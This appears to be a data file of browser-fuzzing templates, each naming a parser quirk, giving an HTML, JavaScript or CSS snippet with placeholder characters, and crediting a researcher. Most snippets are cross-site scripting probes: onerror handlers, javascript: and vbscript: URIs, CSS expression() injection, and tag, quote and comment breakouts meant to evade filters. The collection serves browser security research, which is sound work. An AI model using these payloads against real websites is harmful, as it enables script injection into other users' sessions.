aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Unicode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters trimmed by trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes